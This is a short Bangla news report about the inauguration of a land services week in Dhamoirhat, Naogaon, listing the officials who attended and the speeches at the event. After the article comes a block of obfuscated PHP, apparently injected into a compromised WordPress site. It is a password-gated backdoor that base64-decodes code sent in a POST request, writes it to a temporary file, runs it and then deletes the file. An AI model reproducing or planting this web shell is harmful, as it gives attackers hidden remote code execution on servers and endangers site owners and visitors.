|

ধামইরহাটে ভূমি সেবা সপ্তাহের উদ্বোধন

প্রকাশিতঃ 10:16 pm | June 08, 2024

ধামইরহাট (নওগাঁ) প্রতিনিধি-
নওগাঁর ধামইরহাটে ভূমি সেবা সপ্তাহের উদ্বোধন করা হয়েছে। স্মার্ট ভূমি সেবা- স্মার্ট নাগরিক এই প্রতিপাদ্যে ৮ জুন সকাল ১০ টায় ভূমি সেবা সপ্তাহের উদ্বোধন করেন উপজেলা পরিষদের চেয়ারম্যান আলহাজ্ব মো. আজাহার আলী। এ সময় উপস্থিত ছিলেন উপজেলা নির্বাহী অফিসার আসমা খাতুন, সহকারি কমিশনার (ভূমি) জেসমিন আকতার, উপজেলা আওয়ামীলীগের সাধারণ সম্পাদক ও সরকারি এম এম কলেজের প্রাক্তন অধ্যাপক মো. শহিদুল ইসলাম, উপজেলা কৃষি কর্মকর্তা কৃষিবিদ তৌফিক আল জুবায়ের, ভারপ্রাপ্ত সমাজসেবা কর্মকর্তা এটিএম ফসিউল আলম সহ বিভিন্ন দপ্তরের কর্মকর্তা, বীর মুক্তিযোদ্ধাগণ শিক্ষকগণ ও বিভিন্ন শ্রেণি -পেশার মানুষ।
উদ্বোধন শেষে উপজেলা পরিষদ মিলনায়নে সহকারী কমিশনার (ভূমি) জেসমিন আক্তারের সভাপতিত্বে অনুষ্ঠিত আলোচনাসভায় ভূমি সেবার বিভিন্ন দিক তুলে ধরে বক্তব্য প্রদান করেন অনুষ্ঠানের প্রধান অতিথি উপজেলা পরিষদের চেয়ারম্যান আলহাজ্ব মো. আজাহার আলী। বিশেষ অতিথির বক্তব্য রাখেন উপজেলা আওয়ামী লীগের সাধারণ সম্পাদক অধ্যাপক শহীদুল ইসলাম, উপজেলা মহিলা ভাইস চেয়ারম্যান ও মহিলা আওয়ামীলীগের সভানেত্রী আঞ্জুয়ারা বেগম, উপজেলা স্বাস্থ্য ও পরিবার পরিকল্পনা কর্মকর্তা ডা. স্বপন কুমার বিশ্বাস, ধামইরহাট থানার ওসি মো.বাহাউদ্দিন ফারুকী বিপিএম,পিপিএম, ইউপি চেয়ারম্যান গোলাম কিবরিয়া, এটিএম বদিউল আলম, ওসমান গণি, মাহফুজুল আলম লাকী, সফিয়া পাইলট উচ্চ বিদ্যালয়ের প্রধান শিক্ষক আব্দুর রহমান, উপজেলা প্রেসক্লাব সভাপতি সিনিয়র সাংবাদিক এম এ মালেক প্রমুখ। ভূমি অফিসের সকল সেবা সম্পূর্ণ ডিজিটালাইজড ভাবে প্রদান করায় এবং অনলাইনে সকল লেনদেন হওয়ায় কোন দূর্নীতির সুযোগ নেই বলে জানান এসিল্যান্ড জেসমিন আকতার।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}